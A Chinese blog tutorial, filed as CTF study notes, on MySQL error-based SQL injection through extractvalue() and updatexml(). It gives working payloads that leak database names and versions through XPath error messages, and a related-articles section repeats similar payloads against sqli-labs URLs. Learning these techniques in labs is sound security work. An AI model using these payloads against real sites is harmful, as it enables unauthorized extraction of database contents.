学习基于extractvalue()和updatexml()的报错注入

最新推荐文章于 2024-04-27 12:46:54 发布
最新推荐文章于 2024-04-27 12:46:54 发布
阅读量5w 收藏 130
点赞数 50
分类专栏: ctf 学习笔记 web安全 文章标签: 学习笔记 小白 sql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zpy1998zpy/article/details/80631036
版权
学习笔记 同时被 3 个专栏收录
21 篇文章 1 订阅
订阅专栏
ctf
18 篇文章 7 订阅
订阅专栏
web安全
16 篇文章 3 订阅
订阅专栏

extractvalue()

extractvalue() :对XML文档进行查询的函数

其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样

语法:extractvalue(目标xml文档,xml路径)

第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))


使用concat()拼接 ‘  /  ‘ 效果相同,

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘/’,(select database()))))

这里在’anything’中查询不到 位置是 /database()的内容,

但也没有语法错误,不会报错,下面故意写入语法错误:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘~’,(select database()))))

可以看出,以~开头的内容不是xml格式的语法,报错,但是会显示无法识别的内容是什么,这样就达到了目的。

有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位

这里查询前5位示意:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5))))


updatexml()

updatexml()函数与extractvalue()类似,是更新xml文档的函数。

语法updatexml(目标xml文档,xml路径,更新的内容)

select username from security.user where id=1 and (updatexml(‘anything’,’/xx/xx’,’anything’))


报错方式相同:

select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))

同样是32位查询。

转载指明出处

文章同步到我的博客: http://119.23.249.120/archives/256
A1ienX
关注
  • 50
    点赞
  • 130
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
web-注入-皮卡丘靶场
07-15
注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被误地用于构造数据库查询时,导致数据库返回误信息。这些误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
SQL注入 updatexmlextractvalue函数介绍)-01
09-15
今天,我们将讨论SQL注入的两种常用函数:updatexmlextractvalue函数。 updatexml函数 updatexml函数是MySQL中的一个XML函数,用于更新XML文档中的数据。其语法为: ``` UPDATEXML(XML_document, XPath_...
SQL注入——基于注入extractvalue()】篇
2301_76437855的博客
03-31 373
这种格式,如果写入其他格式就会,并且会返回写入的非法格式内容,误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的误信息最大长度为32,如果误信息超过了最大长度,有可能导致显示不全。基于注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的误提示回显出来。常用的功能函数包括extractvalue()、updatexml()、floor()、exp()等。
SQL注入原理-详细讲解 extractvalue()、updatexml()、floor() 的原因
大大大蜜蜂的博客
10-12 4960
SQL注入原理 一、xpath语法格式误的: mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQL对extractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
字符串类型漏洞之updatexml函数盲注
最新发布
Pythonit教程网
04-27 1248
攻击者通过构造 CONCAT 函数来包含他们想要查询的信息(在这个例子中是数据库的版本号 @@version),并将其夹在两个 0x7e(波浪号 ~ 的 ASCII 值)之间。盲注是指攻击者无法直接看到查询结果的情况,但可以通过观察应用程序的响应(例如,是否产生误)来推断出查询的结果。在 SQL 注入攻击中,攻击者尝试通过在应用程序的输入字段中插入或“注入”恶意的 SQL 代码片段,来干扰应用程序的正常 SQL 查询。输入验证和清理:对用户输入进行严格的验证和清理,确保只接受预期的格式和类型的数据。
updatexml函数
m0_62092622的博客
01-27 9138
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据来获取所需要的信...
SQL注入注入(floor、extractvalueupdatexml
qq_60463414的博客
07-31 1751
sql注入注入
updatexml mysql_深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()注入
weixin_39942108的博客
01-30 474
SQL各种参数类型下的注入测试数字型-sqlilabs less2前面文章已演示过字符型-sqlilabs less1前面文章已演示过搜索型-自写测试如:www.test.com/index.php?id=1www.test.com/index.php?id=abc(搜索型,一般产生在网站的搜索框)http://www.test.com/search.php?q=1区分参数类型的原因:当参数类型为...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1062
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
sql注入 自学笔记 注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
floor()函数可以与group by和rand()函数联用来进行注入原理:floor()函数与group by联用时,如果临时表中没有该主键,则在插入前会计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中...
MrWQ#vulnerability-paper#SQL 注入基础 (注入及延时注入)1
07-25
1、判断是否存在 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
update.xml
07-07
软件更新升级 <?xml version="1.0" encoding="utf-8" ?> <Update> <Soft Name="BlogWriter"> <Verson>1.0.1.2</Verson> <DownLoad>http://www.csdn.net/BlogWrite.rar</DownLoad> </Soft> </Update>
SQL注入基础整理及Tricks总结1
08-03
其他如`GEOMETRYCOLLECTION()`, `MULTIPOINT()`, `POLYGON()`, `MULTIPOLYGON()`, `LINESTRING()`, `MULTILINESTRING()`, `EXP()`等函数也可用于注入,通过触发不同的误类型来获取信息。 三、布尔盲注 布尔...
SQL注入注入_基于updatexml()
wangyuxiang946的博客
06-21 1万+
先介绍一下updatexml()的基本用法 updatexml(参数1 , 参数2 , 参数3); 参数1: 文件名 ,
MYSQL ExtractValueUpdateXml注入详解
AaronLuo
08-26 2521
MYSQL Extractvalue 注入 Extractvalue() 函数 使用XPath表示法从XML字符串中提取值 参数 xml_frag, xpath_expr xml_frag: 目标xml文档 xpath_expr: 利用Xpath路径法表示的查找路径 原理:Xpath格式语法书写误的话,就会 例如 SELECT extractvalue('<a&gt...
ArcGIS应用(一)提取遥感影像各波段值
热门推荐
soderayer的博客
05-08 1万+
1.使用数据 Indian Pines航空高光谱遥感影像(简称“Indian Pines数据”),该数据由NASA AVIRIS传感器于1992年6月12日在美国印第安纳州西 北部农业区获取。该数据空间分辨率为20m,影像空间大小为145x145像素(21025个),光谱范围为0.4~2.5um,由224个波段构成。该区域包含16种农业区域地表覆盖类型组成,该区域标注像元总数目为148152个,且不同地物标注像元数目不均衡。图3-5为Indian Pines数据的假彩色合成影像及地表真实覆盖类型。 2.
Oracle中对XMLType的简单操作(extract、extractvalue
一步之遥的距离是多少
12-20 1705
前几天一直在做Oracle对XMLType字段的操作,我还不是Oracle大拿,到网上找了很多资料,但是很多就是单一功能的介绍,不能很好的解决问题,现在在这里总结下。 1、下面先创建一个名未test.xml的配置文件。       -----nam0-22-----^^^450-           抗震救灾        奥运会        
21、注入篇————MYSQL数据库Extravtvalue注入
Fly_鹏程万里
03-02 1537
MYSQL数据库Extravtvalue注入查询数据库版本信息http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))链接用户http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, ...
minecraft语法大全
02-16
Minecraft是一款非常受欢迎的沙盒游戏,它具有丰富的游戏内容和灵活的创造性。以下是一些常用的Minecraft语法: 1. 命令语法:Minecraft中有各种各样的命令,可以通过输入斜杠(/)来执行。例如,/gamemode creative可以将玩家的游戏模式设置为创造模式。 2. 方块和物品语法:Minecraft中有大量的方块和物品,它们都有自己的语法。例如,使用方块语法可以放置或破坏方块,使用物品语法可以获取或使用物品。 3. 实体语法:实体是Minecraft中的生物、怪物或其他非生物实体。实体语法用于控制实体的行为和属性。例如,使用实体语法可以生成怪物或改变实体的属性。 4. 事件语法:Minecraft中有各种各样的事件,例如玩家移动、方块被放置等。事件语法用于定义事件触发时的行为。例如,可以使用事件语法在玩家移动时执行某些操作。 5. 条件语法:条件语法用于在命令执行时进行条件判断。例如,可以使用条件语法检查玩家是否拥有某个物品,然后执行相应的命令。 这只是Minecraft语法的一小部分,实际上还有很多其他的语法和用法。如果你对特定的语法或功能有更具体的问题,可以告诉我,我会尽力回答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值